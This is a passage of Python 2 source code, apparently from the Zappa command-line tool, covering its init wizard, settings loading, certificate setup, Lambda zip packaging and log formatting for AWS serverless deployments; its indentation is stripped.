# AWS provides no way to tie a APIGW domain name to its Lambda funciton.
domain_url = self.stage_config.get('domain', None)
if domain_url:
status_dict["Domain URL"] = 'https://' + domain_url
else:
status_dict["Domain URL"] = "None Supplied"
# Scheduled Events
event_rules = self.zappa.get_event_rules_for_lambda(lambda_arn=self.lambda_arn)
status_dict["Num. Event Rules"] = len(event_rules)
if len(event_rules) > 0:
status_dict['Events'] = []
for rule in event_rules:
event_dict = {}
rule_name = rule['Name']
event_dict["Event Rule Name"] = rule_name
event_dict["Event Rule Schedule"] = rule.get(u'ScheduleExpression', None)
event_dict["Event Rule State"] = rule.get(u'State', None).title()
event_dict["Event Rule ARN"] = rule.get(u'Arn', None)
status_dict['Events'].append(event_dict)
if return_json:
# Putting the status in machine readable format
# https://github.com/Miserlou/Zappa/issues/407
print(json.dumpsJSON(status_dict))
else:
click.echo("Status for " + click.style(self.lambda_name, bold=True) + ": ")
for k, v in status_dict.items():
if k == 'Events':
# Events are a list of dicts
for event in v:
for item_k, item_v in event.items():
tabular_print(item_k, item_v)
else:
tabular_print(k, v)
# TODO: S3/SQS/etc. type events?
return True
def check_stage_name(self, stage_name):
"""
Make sure the stage name matches the AWS-allowed pattern
(calls to apigateway_client.create_deployment, will fail with error
message "ClientError: An error occurred (BadRequestException) when
calling the CreateDeployment operation: Stage name only allows
a-zA-Z0-9_" if the pattern does not match)
"""
if self.stage_name_env_pattern.match(stage_name):
return True
raise ValueError("AWS requires stage name to match a-zA-Z0-9_")
def check_environment(self, environment):
"""
Make sure the environment contains only strings
(since putenv needs a string)
"""
non_strings = []
for k,v in environment.iteritems():
if not isinstance(v, basestring):
non_strings.append(k)
if non_strings:
raise ValueError("The following environment variables are not strings: {}".format(", ".join(non_strings)))
else:
return True
def init(self, settings_file="zappa_settings.json"):
"""
Initialize a new Zappa project by creating a new zappa_settings.json in a guided process.
This should probably be broken up into few separate componants once it's stable.
Testing these raw_inputs requires monkeypatching with mock, which isn't pretty.
"""
# Ensure that we don't already have a zappa_settings file.
if os.path.isfile(settings_file):
raise ClickException("This project is " + click.style("already initialized", fg="red", bold=True) + "!")
# Ensure P2 until Lambda supports it.
if sys.version_info >= (3,0): # pragma: no cover
raise ClickException("Zappa curently only works with Python 2, until AWS Lambda adds Python 3 support.")
# Ensure inside virtualenv.
if not ( hasattr(sys, 'prefix') or hasattr(sys, 'real_prefix') or hasattr(sys, 'base_prefix') ): # pragma: no cover
raise ClickException(
"Zappa must be run inside of a virtual environment!\n"
"Learn more about virtual environments here: http://docs.python-guide.org/en/latest/dev/virtualenvs/")
# Explain system.
click.echo(click.style(u"""\n███████╗ █████╗ ██████╗ ██████╗ █████╗
╚══███╔╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗
███╔╝ ███████║██████╔╝██████╔╝███████║
███╔╝ ██╔══██║██╔═══╝ ██╔═══╝ ██╔══██║
███████╗██║ ██║██║ ██║ ██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝\n""", fg='green', bold=True))
click.echo(click.style("Welcome to ", bold=True) + click.style("Zappa", fg='green', bold=True) + click.style("!\n", bold=True))
click.echo(click.style("Zappa", bold=True) + " is a system for running server-less Python web applications"
" on AWS Lambda and AWS API Gateway.")
click.echo("This `init` command will help you create and configure your new Zappa deployment.")
click.echo("Let's get started!\n")
# Create Env
while True:
click.echo("Your Zappa configuration can support multiple production environments, like '" +
click.style("dev", bold=True) + "', '" + click.style("staging", bold=True) + "', and '" +
click.style("production", bold=True) + "'.")
env = raw_input("What do you want to call this environment (default 'dev'): ") or "dev"
try:
self.check_stage_name(env)
break
except ValueError:
click.echo(click.style("Environment names must match a-zA-Z0-9_", fg='red'))
# Create Bucket
click.echo("\nYour Zappa deployments will need to be uploaded to a " + click.style("private S3 bucket", bold=True) + ".")
click.echo("If you don't have a bucket yet, we'll create one for you too.")
default_bucket = "zappa-" + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(9))
bucket = raw_input("What do you want call your bucket? (default '%s'): " % default_bucket) or default_bucket
# TODO actually create bucket.
# Detect Django/Flask
try: # pragma: no cover
import django
has_django = True
except ImportError as e:
has_django = False
try: # pragma: no cover
import flask
has_flask = True
except ImportError as e:
has_flask = False
print('')
# App-specific
if has_django: # pragma: no cover
click.echo("It looks like this is a " + click.style("Django", bold=True) + " application!")
click.echo("What is the " + click.style("module path", bold=True) + " to your projects's Django settings?")
django_settings = None
matches = detect_django_settings()
while django_settings in [None, '']:
if matches:
click.echo("We discovered: " + click.style(', '.join('{}'.format(i) for v, i in enumerate(matches)), bold=True))
django_settings = raw_input("Where are your project's settings? (default '%s'): " % matches[0]) or matches[0]
else:
click.echo("(This will likely be something like 'your_project.settings')")
django_settings = raw_input("Where are your project's settings?: ")
django_settings = django_settings.replace("'", "")
django_settings = django_settings.replace('"', "")
else:
matches = None
if has_flask:
click.echo("It looks like this is a " + click.style("Flask", bold=True) + " application.")
matches = detect_flask_apps()
click.echo("What's the " + click.style("modular path", bold=True) + " to your app's function?")
click.echo("This will likely be something like 'your_module.app'.")
app_function = None
while app_function in [None, '']:
if matches:
click.echo("We discovered: " + click.style(', '.join('{}'.format(i) for v, i in enumerate(matches)), bold=True))
app_function = raw_input("Where is your app's function? (default '%s'): " % matches[0]) or matches[0]
else:
app_function = raw_input("Where is your app's function?: ")
app_function = app_function.replace("'", "")
app_function = app_function.replace('"', "")
# TODO: Create VPC?
# Memory size? Time limit?
# Domain? LE keys? Region?
# 'Advanced Settings' mode?
# Globalize
click.echo("\nYou can optionally deploy to " + click.style("all available regions", bold=True) + " in order to provide fast global service.")
click.echo("If you are using Zappa for the first time, you probably don't want to do this!")
global_deployment = False
while True:
global_type = raw_input("Would you like to deploy this application to " + click.style("globally", bold=True) + "? (default 'n') [y/n/(p)rimary]: ")
if not global_type:
break
if global_type.lower() in ["y", "yes", "p", "primary"]:
global_deployment = True
break
if global_type.lower() in ["n", "no"]:
global_deployment = False
break
if global_deployment:
regions = API_GATEWAY_REGIONS
if global_type.lower() in ["p", "primary"]:
envs = [{env + '_' + region.replace('-', '_'): { 'aws_region': region}} for region in regions if '-1' in region]
else:
envs = [{env + '_' + region.replace('-', '_'): { 'aws_region': region}} for region in regions]
else:
region = None # assume system default
envs = [{env: {}}]
zappa_settings = {}
for each_env in envs:
# Honestly, this could be cleaner.
env_name = each_env.keys()[0]
env_dict = each_env[env_name]
env_bucket = bucket
if global_deployment:
env_bucket = bucket.replace('-', '_') + '_' + env_name
env_zappa_settings = {
env_name: {
's3_bucket': env_bucket,
}
}
if env_dict.has_key('aws_region'):
env_zappa_settings[env_name]['aws_region'] = env_dict.get('aws_region')
zappa_settings.update(env_zappa_settings)
if has_django:
zappa_settings[env_name]['django_settings'] = django_settings
else:
zappa_settings[env_name]['app_function'] = app_function
import json as json # hjson is fine for loading, not fine for writing.
zappa_settings_json = json.dumps(zappa_settings, sort_keys=True, indent=4)
click.echo("\nOkay, here's your " + click.style("zappa_settings.js", bold=True) + ":\n")
click.echo(click.style(zappa_settings_json, fg="yellow", bold=False))
confirm = raw_input("\nDoes this look " + click.style("okay", bold=True, fg="green") + "? (default 'y') [y/n]: ") or 'yes'
if confirm[0] not in ['y', 'Y', 'yes', 'YES']:
click.echo("" + click.style("Sorry", bold=True, fg='red') + " to hear that! Please init again.")
return
# Write
with open("zappa_settings.json", "w") as zappa_settings_file:
zappa_settings_file.write(zappa_settings_json)
if global_deployment:
click.echo("\n" + click.style("Done", bold=True) + "! You can also " + click.style("deploy all", bold=True) + " by executing:\n")
click.echo(click.style("\t$ zappa deploy --all", bold=True))
click.echo("\nAfter that, you can " + click.style("update", bold=True) + " your application code with:\n")
click.echo(click.style("\t$ zappa update --all", bold=True))
else:
click.echo("\n" + click.style("Done", bold=True) + "! Now you can " + click.style("deploy", bold=True) + " your Zappa application by executing:\n")
click.echo(click.style("\t$ zappa deploy %s" % env, bold=True))
click.echo("\nAfter that, you can " + click.style("update", bold=True) + " your application code with:\n")
click.echo(click.style("\t$ zappa update %s" % env, bold=True))
click.echo("\nTo learn more, check out our project page on " + click.style("GitHub", bold=True) +
" here: " + click.style("https://github.com/Miserlou/Zappa", fg="cyan", bold=True))
click.echo("and stop by our " + click.style("Slack", bold=True) + " channel here: " +
click.style("http://bit.do/zappa", fg="cyan", bold=True))
click.echo("\nEnjoy!,")
click.echo(" ~ Team " + click.style("Zappa", bold=True) + "!")
return
def certify(self, no_cleanup=False):
"""
Register or update a domain certificate for this env.
"""
# Give warning on --no-cleanup
if no_cleanup:
clean_up = False
click.echo(click.style("Warning!", fg="red", bold=True) + " You are calling certify with " +
click.style("--no-cleanup", bold=True) +
". Your certificate files will remain in the system temporary directory after this command executes!")
else:
clean_up = True
# Make sure this isn't already deployed.
deployed_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if len(deployed_versions) == 0:
raise ClickException("This application " + click.style("isn't deployed yet", fg="red") +
" - did you mean to call " + click.style("deploy", bold=True) + "?")
# Get install account_key to /tmp/account_key.pem
account_key_location = self.stage_config.get('lets_encrypt_key')
domain = self.stage_config.get('domain')
cert_location = self.stage_config.get('certificate', None)
cert_key_location = self.stage_config.get('certificate_key', None)
cert_chain_location = self.stage_config.get('certificate_chain', None)
if not domain:
raise ClickException("Can't certify a domain without " + click.style("domain", fg="red", bold=True) + " configured!")
if not cert_location:
if not account_key_location:
raise ClickException("Can't certify a domain without " + click.style("lets_encrypt_key", fg="red", bold=True) + " configured!")
if account_key_location.startswith('s3://'):
bucket, key_name = parse_s3_url(account_key_location)
self.zappa.s3_client.download_file(bucket, key_name, '/tmp/account.key')
else:
from shutil import copyfile
copyfile(account_key_location, '/tmp/account.key')
else:
if not cert_location or not cert_key_location or not cert_chain_location:
raise ClickException("Can't certify a domain without " +
click.style("certificate, certificate_key and certificate_chain", fg="red", bold=True) + " configured!")
# Read the supplied certificates.
with open(cert_location) as f:
certificate_body = f.read()
with open(cert_key_location) as f:
certificate_private_key = f.read()
with open(cert_chain_location) as f:
certificate_chain = f.read()
click.echo("Certifying domain " + click.style(domain, fg="green", bold=True) + "..")
# Get cert and update domain.
if not cert_location:
from letsencrypt import get_cert_and_update_domain, cleanup
cert_success = get_cert_and_update_domain(
self.zappa,
self.lambda_name,
self.api_stage,
domain,
clean_up
)
else:
if not self.zappa.get_domain_name(domain):
self.zappa.create_domain_name(
domain,
domain + "-Zappa-Cert",
certificate_body,
certificate_private_key,
certificate_chain,
self.lambda_name,
self.api_stage
)
print("Created a new domain name. Please note that it can take up to 40 minutes for this domain to be "
"created and propagated through AWS, but it requires no further work on your part.")
else:
self.zappa.update_domain_name(
domain,
domain + "-Zappa-Cert",
certificate_body,
certificate_private_key,
certificate_chain
)
cert_success = True
# Deliberately undocumented feature (for now, at least.)
# We are giving the user the ability to shoot themselves in the foot.
# _This is probably not a good idea._
# However, I am sick and tired of hitting the Let's Encrypt cert
# limit while testing.
if clean_up:
cleanup()
if cert_success:
click.echo("Certificate " + click.style("updated", fg="green", bold=True) + "!")
else:
click.echo(click.style("Failed", fg="red", bold=True) + " to generate or install certificate! :(")
click.echo("\n==============\n")
shamelessly_promote()
##
# Utility
##
def callback(self, position):
"""
Allows the execution of custom code between creation of the zip file and deployment to AWS.
:return: None
"""
callbacks = self.stage_config.get('callbacks', {})
callback = callbacks.get(position)
if callback:
(mod_path, cb_func_name) = callback.rsplit('.', 1)
try: # Prefer callback in working directory
if mod_path.count('.') >= 1: # Callback function is nested in a folder
(mod_folder_path, mod_name) = mod_path.rsplit('.', 1)
mod_folder_path_fragments = mod_folder_path.split('.')
working_dir = os.path.join(os.getcwd(), *mod_folder_path_fragments)
else:
mod_name = mod_path
working_dir = os.getcwd()
working_dir_importer = pkgutil.get_importer(working_dir)
module_ = working_dir_importer.find_module(mod_name).load_module(mod_name)
except (ImportError, AttributeError):
try: # Callback func might be in virtualenv
module_ = importlib.import_module(mod_path)
except ImportError: # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"import {position} callback ".format(position=position),
bold=True) + 'module: "{mod_path}"'.format(mod_path=click.style(mod_path, bold=True)))
if not hasattr(module_, cb_func_name): # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"find {position} callback ".format(position=position), bold=True) + 'function: "{cb_func_name}" '.format(
cb_func_name=click.style(cb_func_name, bold=True)) + 'in module "{mod_path}"'.format(mod_path=mod_path))
cb_func = getattr(module_, cb_func_name)
cb_func(self) # Call the function passing self
def check_for_update(self):
"""
Print a warning if there's a new Zappa version available.
"""
try:
version = pkg_resources.require("zappa")[0].version
updateable = check_new_version_available(version)
if updateable:
click.echo(click.style("Important!", fg="yellow", bold=True) +
" A new version of " + click.style("Zappa", bold=True) + " is available!")
click.echo("Upgrade with: " + click.style("pip install zappa --upgrade", bold=True))
click.echo("Visit the project page on GitHub to see the latest changes: " +
click.style("https://github.com/Miserlou/Zappa", bold=True))
except Exception as e: # pragma: no cover
print(e)
return
def load_settings(self, settings_file=None, session=None):
"""
Load the local zappa_settings file.
An existing boto session can be supplied, though this is likely for testing purposes.
Returns the loaded Zappa object.
"""
# Ensure we're passed a valid settings file.
if not settings_file:
settings_file = self.get_json_or_yaml_settings()
if not os.path.isfile(settings_file):
raise ClickException("Please configure your zappa_settings file.")
# Load up file
self.load_settings_file(settings_file)
# Make sure that the environments are valid names:
for stage_name in self.zappa_settings.keys():
try:
self.check_stage_name(stage_name)
except ValueError:
raise ValueError("API stage names must match a-zA-Z0-9_ ; '{0!s}' does not.".format(stage_name))
# Make sure that this environment is our settings
if self.api_stage not in self.zappa_settings.keys():
raise ClickException("Please define '{0!s}' in your Zappa settings.".format(self.api_stage))
# We need a working title for this project. Use one if supplied, else cwd dirname.
if 'project_name' in self.stage_config: # pragma: no cover
self.project_name = self.stage_config['project_name']
else:
self.project_name = slugify.slugify(os.getcwd().split(os.sep)[-1])[:15]
if len(self.project_name) > 15: # pragma: no cover
click.echo(click.style("Warning", fg="red", bold=True) + "! Your " + click.style("project_name", bold=True) +
" may be too long to deploy! Please make it <16 characters.")
# The name of the actual AWS Lambda function, ex, 'helloworld-dev'
# Django's slugify doesn't replace _, but this does.
self.lambda_name = slugify.slugify(self.project_name + '-' + self.api_stage)
# Load environment-specific settings
self.s3_bucket_name = self.stage_config.get('s3_bucket', "zappa-" + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(9)))
self.vpc_config = self.stage_config.get('vpc_config', {})
self.memory_size = self.stage_config.get('memory_size', 512)
self.app_function = self.stage_config.get('app_function', None)
self.exception_handler = self.stage_config.get('exception_handler', None)
self.aws_region = self.stage_config.get('aws_region', None)
self.debug = self.stage_config.get('debug', True)
self.prebuild_script = self.stage_config.get('prebuild_script', None)
self.profile_name = self.stage_config.get('profile_name', None)
self.log_level = self.stage_config.get('log_level', "DEBUG")
self.domain = self.stage_config.get('domain', None)
self.timeout_seconds = self.stage_config.get('timeout_seconds', 30)
# Provide legacy support for `use_apigateway`, now `apigateway_enabled`.
# https://github.com/Miserlou/Zappa/issues/490
# https://github.com/Miserlou/Zappa/issues/493
self.use_apigateway = self.stage_config.get('use_apigateway', True)
if self.use_apigateway:
self.use_apigateway = self.stage_config.get('apigateway_enabled', True)
self.integration_content_type_aliases = self.stage_config.get('integration_content_type_aliases', {})
self.lambda_handler = self.stage_config.get('lambda_handler', 'handler.lambda_handler')
# DEPRICATED. https://github.com/Miserlou/Zappa/issues/456
self.remote_env_bucket = self.stage_config.get('remote_env_bucket', None)
self.remote_env_file = self.stage_config.get('remote_env_file', None)
self.remote_env = self.stage_config.get('remote_env', None)
self.settings_file = self.stage_config.get('settings_file', None)
self.django_settings = self.stage_config.get('django_settings', None)
self.manage_roles = self.stage_config.get('manage_roles', True)
self.api_key_required = self.stage_config.get('api_key_required', False)
self.api_key = self.stage_config.get('api_key')
self.iam_authorization = self.stage_config.get('iam_authorization', False)
self.cors = self.stage_config.get("cors", None)
self.lambda_description = self.stage_config.get('lambda_description', "Zappa Deployment")
self.environment_variables = self.stage_config.get('environment_variables', {})
self.check_environment(self.environment_variables)
self.authorizer = self.stage_config.get('authorizer', {})
self.zappa = Zappa( boto_session=session,
profile_name=self.profile_name,
aws_region=self.aws_region,
load_credentials=self.load_credentials
)
for setting in CUSTOM_SETTINGS:
if setting in self.stage_config:
setting_val = self.stage_config[setting]
# Read the policy file contents.
if setting.endswith('policy'):
with open(setting_val, 'r') as f:
setting_val = f.read()
setattr(self.zappa, setting, setting_val)
if self.app_function:
self.collision_warning(self.app_function)
if self.app_function[-3:] == '.py':
click.echo(click.style("Warning!", fg="red", bold=True) +
" Your app_function is pointing to a " + click.style("file and not a function", bold=True) +
"! It should probably be something like 'my_file.app', not 'my_file.py'!")
return self.zappa
def get_json_or_yaml_settings(self, settings_name="zappa_settings"):
"""
Return zappa_settings path as JSON or YAML (or TOML), as appropriate.
"""
zs_json = settings_name + ".json"
zs_yaml = settings_name + ".yml"
zs_toml = settings_name + ".toml"
# Must have at least one
if not os.path.isfile(zs_json) \
and not os.path.isfile(zs_yaml) \
and not os.path.isfile(zs_toml):
raise ClickException("Please configure a zappa_settings file.")
# Prefer JSON
if os.path.isfile(zs_json):
settings_file = zs_json
elif os.path.isfile(zs_toml):
settings_file = zs_toml
else:
settings_file = zs_yaml
return settings_file
def load_settings_file(self, settings_file=None):
"""
Load our settings file.
"""
if not settings_file:
settings_file = self.get_json_or_yaml_settings()
if not os.path.isfile(settings_file):
raise ClickException("Please configure your zappa_settings file.")
if '.yml' in settings_file:
with open(settings_file) as yaml_file:
try:
self.zappa_settings = yaml.load(yaml_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings YAML. It may be malformed.")
elif '.toml' in settings_file:
with open(settings_file) as toml_file:
try:
self.zappa_settings = toml.load(toml_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings TOML. It may be malformed.")
else:
with open(settings_file) as json_file:
try:
self.zappa_settings = json.load(json_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings JSON. It may be malformed.")
def create_package(self):
"""
Ensure that the package can be properly configured,
and then create it.
"""
# Create the Lambda zip package (includes project and virtualenvironment)
# Also define the path the handler file so it can be copied to the zip
# root for Lambda.
current_file = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
handler_file = os.sep.join(current_file.split(os.sep)[0:]) + os.sep + 'handler.py'
# Create the zip file(s)
if self.stage_config.get('slim_handler', False):
# Create two zips. One with the application and the other with just the handler.
# https://github.com/Miserlou/Zappa/issues/510
self.zip_path = self.zappa.create_lambda_zip(
prefix=self.lambda_name,
use_precompiled_packages=self.stage_config.get('use_precompiled_packages', True),
exclude=self.stage_config.get('exclude', [])
)
# Make sure the normal venv is not included in the handler's zip
exclude = self.stage_config.get('exclude', [])
cur_venv = self.zappa.get_current_venv()
exclude.append(cur_venv.split('/')[-1])
self.handler_path = self.zappa.create_lambda_zip(
prefix='handler_{0!s}'.format(self.lambda_name),
venv=self.zappa.create_handler_venv(),
handler_file=handler_file,
slim_handler=True,
exclude=exclude
)
else:
# Create a single zip that has the handler and application
self.zip_path = self.zappa.create_lambda_zip(
prefix=self.lambda_name,
handler_file=handler_file,
use_precompiled_packages=self.stage_config.get('use_precompiled_packages', True),
exclude=self.stage_config.get(
'exclude',
# Exclude packages already builtin to the python lambda environment
# https://github.com/Miserlou/Zappa/issues/556
["boto3", "dateutil", "botocore", "s3transfer", "six.py", "jmespath", "concurrent"])
)
# Warn if this is too large for Lambda.
file_stats = os.stat(self.zip_path)
if file_stats.st_size > 52428800: # pragma: no cover
print('\n\nWarning: Application zip package is likely to be too large for AWS Lambda. '
'Try setting "slim_handler" to true in your Zappa settings file.\n\n')
# Throw custom setings into the zip that handles requests
if self.stage_config.get('slim_handler', False):
handler_zip = self.handler_path
else:
handler_zip = self.zip_path
with zipfile.ZipFile(handler_zip, 'a') as lambda_zip:
settings_s = "# Generated by Zappa\n"
if self.app_function:
if '.' not in self.app_function: # pragma: no cover
raise ClickException("Your " + click.style("app_function", fg='red', bold=True) + " value is not a modular path." +
" It needs to be in the format `" + click.style("your_module.your_app_object", bold=True) + "`.")
app_module, app_function = self.app_function.rsplit('.', 1)
settings_s = settings_s + "APP_MODULE='{0!s}'\nAPP_FUNCTION='{1!s}'\n".format(app_module, app_function)
if self.exception_handler:
settings_s += "EXCEPTION_HANDLER='{0!s}'\n".format(self.exception_handler)
else:
settings_s += "EXCEPTION_HANDLER=None\n"
if self.debug:
settings_s = settings_s + "DEBUG=True\n"
else:
settings_s = settings_s + "DEBUG=False\n"
settings_s = settings_s + "LOG_LEVEL='{0!s}'\n".format((self.log_level))
# If we're on a domain, we don't need to define the /<<env>> in
# the WSGI PATH
if self.domain:
settings_s = settings_s + "DOMAIN='{0!s}'\n".format((self.domain))
else:
settings_s = settings_s + "DOMAIN=None\n"
# Pass through remote config bucket and path
if self.remote_env:
settings_s = settings_s + "REMOTE_ENV='{0!s}'\n".format(
self.remote_env
)
# DEPRICATED. use remove_env instead
elif self.remote_env_bucket and self.remote_env_file:
settings_s = settings_s + "REMOTE_ENV='s3://{0!s}/{1!s}'\n".format(
self.remote_env_bucket, self.remote_env_file
)
# Local envs
env_dict = {}
if self.aws_region:
env_dict['AWS_REGION'] = self.aws_region
env_dict.update(dict(self.environment_variables))
# Environement variable keys can't be Unicode
# https://github.com/Miserlou/Zappa/issues/604
try:
env_dict = dict((k.encode('ascii'), v) for (k, v) in env_dict.items())
except Exception: # pragma: nocover
raise ValueError("Environment variable keys must not be unicode.")
settings_s = settings_s + "ENVIRONMENT_VARIABLES={0}\n".format(
env_dict
)
# We can be environment-aware
settings_s = settings_s + "API_STAGE='{0!s}'\n".format((self.api_stage))
settings_s = settings_s + "PROJECT_NAME='{0!s}'\n".format((self.project_name))
if self.settings_file:
settings_s = settings_s + "SETTINGS_FILE='{0!s}'\n".format((self.settings_file))
else:
settings_s = settings_s + "SETTINGS_FILE=None\n"
if self.django_settings:
settings_s = settings_s + "DJANGO_SETTINGS='{0!s}'\n".format((self.django_settings))
else:
settings_s = settings_s + "DJANGO_SETTINGS=None\n"
# If slim handler, path to project zip
if self.stage_config.get('slim_handler', False):
settings_s += "ZIP_PATH='s3://{0!s}/{1!s}_current_project.zip'\n".format(self.s3_bucket_name, self.project_name)
# AWS Events function mapping
event_mapping = {}
events = self.stage_config.get('events', [])
for event in events:
arn = event.get('event_source', {}).get('arn')
function = event.get('function')
if arn and function:
event_mapping[arn] = function
settings_s = settings_s + "AWS_EVENT_MAPPING={0!s}\n".format(event_mapping)
# Authorizer config
authorizer_function = self.authorizer.get('function', None)
if authorizer_function:
settings_s += "AUTHORIZER_FUNCTION='{0!s}'\n".format(authorizer_function)
# Copy our Django app into root of our package.
# It doesn't work otherwise.
if self.django_settings:
base = __file__.rsplit(os.sep, 1)[0]
django_py = ''.join(os.path.join(base, 'ext', 'django_zappa.py'))
lambda_zip.write(django_py, 'django_zappa_app.py')
# Lambda requires a specific chmod
temp_settings = tempfile.NamedTemporaryFile(delete=False)
os.chmod(temp_settings.name, 0o644)
temp_settings.write(settings_s)
temp_settings.close()
lambda_zip.write(temp_settings.name, 'zappa_settings.py')
os.remove(temp_settings.name)
def remove_local_zip(self):
"""
Remove our local zip file.
"""
if self.stage_config.get('delete_local_zip', True):
try:
if os.path.isfile(self.zip_path):
os.remove(self.zip_path)
if self.handler_path and os.path.isfile(self.handler_path):
os.remove(self.handler_path)
except Exception as e: # pragma: no cover
sys.exit(-1)
def remove_uploaded_zip(self):
"""
Remove the local and S3 zip file after uploading and updating.
"""
# Remove the uploaded zip from S3, because it is now registered..
if self.stage_config.get('delete_s3_zip', True):
self.zappa.remove_from_s3(self.zip_path, self.s3_bucket_name)
if self.stage_config.get('slim_handler', False):
# Need to keep the project zip as the slim handler uses it.
self.zappa.remove_from_s3(self.handler_path, self.s3_bucket_name)
def on_exit(self):
"""
Cleanup after the command finishes.
Always called: SystemExit, KeyboardInterrupt and any other Exception that occurs.
"""
if self.zip_path:
self.remove_uploaded_zip()
self.remove_local_zip()
def print_logs(self, logs, colorize=True, http=False, non_http=False):
"""
Parse, filter and print logs to the console.
"""
for log in logs:
timestamp = log['timestamp']
message = log['message']
if "START RequestId" in message:
continue
if "REPORT RequestId" in message:
continue
if "END RequestId" in message:
continue
if not colorize:
if http:
if self.is_http_log_entry(message.strip()):
print("[" + str(timestamp) + "] " + message.strip())
elif non_http:
if not self.is_http_log_entry(message.strip()):
print("[" + str(timestamp) + "] " + message.strip())
else:
print("[" + str(timestamp) + "] " + message.strip())
else:
if http:
if self.is_http_log_entry(message.strip()):
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
elif non_http:
if not self.is_http_log_entry(message.strip()):
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
else:
click.echo(click.style("[", fg='cyan') + click.style(str(timestamp), bold=True) + click.style("]", fg='cyan') + self.colorize_log_entry(message.strip()))
def is_http_log_entry(self, string):
"""
Determines if a log entry is an HTTP-formatted log string or not.
"""
# Debug event filter
if 'Zappa Event' in string:
return False
# IP address filter
for token in string.replace('\t', ' ').split(' '):
try:
if (token.count('.') is 3 and token.replace('.', '').isnumeric()):
return True
except Exception: # pragma: no cover
pass
return False
def colorize_log_entry(self, string):
"""
Apply various heuristics to return a colorized version of a string.
If these fail, simply return the string in plaintext.
"""
final_string = string
try:
# First, do stuff in square brackets
inside_squares = re.findall(r'\[([^]]*)\]', string)
for token in inside_squares:
if token in ['CRITICAL', 'ERROR', 'WARNING', 'DEBUG', 'INFO', 'NOTSET']:
final_string = final_string.replace('[' + token + ']', click.style("[", fg='cyan') + click.style(token, fg='cyan', bold=True) + click.style("]", fg='cyan'))
else:
final_string = final_string.replace('[' + token + ']', click.style("[", fg='cyan') + click.style(token, bold=True) + click.style("]", fg='cyan'))
# Then do quoted strings
quotes = re.findall(r'"[^"]*"', string)
for token in quotes:
final_string = final_string.replace(token, click.style(token, fg="yellow"))
# And UUIDs
for token in final_string.replace('\t', ' ').split(' '):
try:
if token.count('-') is 4 and token.replace('-', '').isalnum():
final_string = final_string.replace(token, click.style(token, fg="magenta"))
except Exception: # pragma: no cover
pass
# And IP addresses
try:
if token.count('.') is 3 and token.replace('.', '').isnumeric():
final_string = final_string.replace(token, click.style(token, fg="red"))
except Exception: # pragma: no cover
pass
# And status codes
try:
if token in ['200']:
final_string = final_string.replace(token, click.style(token, fg="green"))
if token in ['400', '401', '403', '404', '405', '500']:
final_string = final_string.replace(token, click.style(token, fg="red"))
except Exception: # pragma: no cover
pass
# And Zappa Events
try:
if "Zappa Event:" in final_string:
final_string = final_string.replace("Zappa Event:", click.style("Zappa Event:", bold=True, fg="green"))
except Exception: # pragma: no cover
pass
# And dates
for token in final_string.split('\t'):
try:
is_date = parser.parse(token)
final_string = final_string.replace(token, click.style(token, fg="green"))
except Exception: # pragma: no cover
pass
final_string = final_string.replace('\t', ' ').replace(' ', ' ')
if final_string[0] != ' ':
final_string = ' ' + final_string
return final_string
except Exception as e: # pragma: no cover
return string
def execute_prebuild_script(self):
"""
Parse and execute the prebuild_script from the zappa_settings.
"""
(pb_mod_path, pb_func) = self.prebuild_script.rsplit('.', 1)
try: # Prefer prebuild script in working directory
if pb_mod_path.count('.') >= 1: # Prebuild script func is nested in a folder
(mod_folder_path, mod_name) = pb_mod_path.rsplit('.', 1)
mod_folder_path_fragments = mod_folder_path.split('.')
working_dir = os.path.join(os.getcwd(), *mod_folder_path_fragments)
else:
mod_name = pb_mod_path
working_dir = os.getcwd()
working_dir_importer = pkgutil.get_importer(working_dir)
module_ = working_dir_importer.find_module(mod_name).load_module(mod_name)
except (ImportError, AttributeError):
try: # Prebuild func might be in virtualenv
module_ = importlib.import_module(pb_mod_path)
except ImportError: # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"import prebuild script ", bold=True) + 'module: "{pb_mod_path}"'.format(
pb_mod_path=click.style(pb_mod_path, bold=True)))
if not hasattr(module_, pb_func): # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"find prebuild script ", bold=True) + 'function: "{pb_func}" '.format(
pb_func=click.style(pb_func, bold=True)) + 'in module "{pb_mod_path}"'.format(
pb_mod_path=pb_mod_path))
prebuild_function = getattr(module_, pb_func)
prebuild_function() # Call the function
def collision_warning(self, item):
"""
Given a string, print a warning if this could
collide with a Zappa core package module.
Use for app functions and events.
"""
namespace_collisions = [
"zappa.", "wsgi.", "middleware.", "handler.", "util.", "letsencrypt.", "cli."
]
for namespace_collision in namespace_collisions:
if namespace_collision in item:
click.echo(click.style("Warning!", fg="red", bold=True) +
" You may have a namespace collision with " + click.style(item, bold=True) +
"! You may want to rename that file.")
def deploy_api_gateway(self, api_id):
cache_cluster_enabled = self.stage_config.get('cache_cluster_enabled', False)
cache_cluster_size = str(self.stage_config.get('cache_cluster_size', .5))
endpoint_url = self.zappa.deploy_api_gateway(
api_id=api_id,
stage_name=self.api_stage,
cache_cluster_enabled=cache_cluster_enabled,
cache_cluster_size=cache_cluster_size,
cloudwatch_log_level=self.stage_config.get('cloudwatch_log_level', 'OFF'),
cloudwatch_data_trace=self.stage_config.get('cloudwatch_data_trace', False),
cloudwatch_metrics_enabled=self.stage_config.get('cloudwatch_metrics_enabled', False),
)
return endpoint_url
####################################################################
# Main
####################################################################
def shamelessly_promote():
"""
Shamelessly promote our little community.
"""
click.echo("Need " + click.style("help", fg='green', bold=True) +
"? Found a " + click.style("bug", fg='green', bold=True) +
